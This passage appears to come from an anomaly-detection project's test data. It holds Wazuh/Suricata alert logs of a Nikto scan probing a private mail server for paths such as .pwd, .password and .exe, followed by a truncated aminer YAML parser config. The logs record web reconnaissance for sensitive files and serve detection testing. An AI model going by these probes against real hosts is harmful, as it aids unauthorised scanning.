(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.599159+0000","flow_id":"1422785210098109.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47094","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pwd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.601252+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":80,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.127634","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.601252+0000\",\"flow_id\":1543190323276216,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47096,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cp866\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.601252+0000","flow_id":"1543190323276216.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47096","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cp866","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.603136+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":81,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.129177","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.603136+0000\",\"flow_id\":1566365966807384,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47098,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ida\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.603136+0000","flow_id":"1566365966807384.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47098","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ida","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.612252+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":82,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.130716","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.612252+0000\",\"flow_id\":1249779632453529,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47100,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.wwwacl\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.612252+0000","flow_id":"1249779632453529.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47100","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.wwwacl","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.616417+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":83,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.132261","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.616417+0000\",\"flow_id\":2152744966841157,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47102,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.UploadServlet\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.616417+0000","flow_id":"2152744966841157.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47102","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.UploadServlet","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.628183+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":84,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.133820","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.628183+0000\",\"flow_id\":486941901094842,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47104,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.PWD\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.628183+0000","flow_id":"486941901094842.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47104","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.PWD","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.634992+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":85,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.135357","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.634992+0000\",\"flow_id\":278614512413618,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47106,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ml\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.634992+0000","flow_id":"278614512413618.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47106","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ml","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.638121+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":86,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.136892","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.638121+0000\",\"flow_id\":2193388242384897,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47108,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.exe\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.638121+0000","flow_id":"2193388242384897.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47108","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.exe","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.641116+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":87,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.138431","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.641116+0000\",\"flow_id\":1061393776952083,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47110,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.listprint\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.641116+0000","flow_id":"1061393776952083.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47110","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.listprint","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.646964+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":88,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.139982","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.646964+0000\",\"flow_id\":403035420023849,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47112,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.link\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.646964+0000","flow_id":"403035420023849.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47112","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.link","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.650090+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":89,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.141521","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.650090+0000\",\"flow_id\":303031401506644,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47114,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.pt\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.650090+0000","flow_id":"303031401506644.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47114","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.pt","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.653055+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":90,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.143056","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.653055+0000\",\"flow_id\":2084777109418518,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47116,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.back\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.653055+0000","flow_id":"2084777109418518.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47116","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.back","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.655279+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":91,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.144597","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.655279+0000\",\"flow_id\":1361650645662792,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47118,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.password\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.655279+0000","flow_id":"1361650645662792.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47118","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.password","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.657354+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":92,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.146146","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.657354+0000\",\"flow_id\":1.24322121737965e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47120,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.php\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.657354+0000","flow_id":"1243221217379650.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47120","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.php","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.659892+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":93,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.147689","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.659892+0000\",\"flow_id\":1976543933501226,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":47122,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.tw\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.659892+0000","flow_id":"1976543933501226.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"47122","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.tw","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/windows.yml000066400000000000000000000073611500476301700301030ustar00rootroot00000000000000LearnMode: False Log.Encoding: 'utf-8' Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/windows_json_logs/Security_Error.log' - 'file:///tmp/windows_json_logs/Security_Working.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: '' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 2 Parser: - id: machinename type: FixedWordlistDataModelElement name: 'machinename' args: - 'N3IM1703.D03.arc.local' - id: data type: FixedWordlistDataModelElement name: 'data' args: - '' - id: index type: DecimalIntegerValueModelElement name: 'index' - id: categorynumber type: 
DecimalIntegerValueModelElement name: 'categorynumber' - id: eventid type: DecimalIntegerValueModelElement name: 'eventid' - id: entrytype type: DecimalIntegerValueModelElement name: 'entrytype' - id: source type: VariableByteDataModelElement name: 'source' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~ ' - id: non_empty_elem type: VariableByteDataModelElement name: 'non_empty_elem' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZüäö0123456789-_.:;&%=+$,/?%#\~()\r\n\t ' #- id: non_empty_elem # type: AnyByteDataModelElement # name: 'non_empty_elem' # #args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.:;&%=+$,/?%#\~Ä ' - id: empty_elem type: FixedWordlistDataModelElement name: 'empty' args: - '' - id: replacementstrings type: FirstMatchModelElement name: 'replacementstrings' args: - non_empty_elem - empty_elem - id: instanceid type: DecimalIntegerValueModelElement name: 'instanceid' - id: timegenerated type: VariableByteDataModelElement name: 'timegenerated' args: 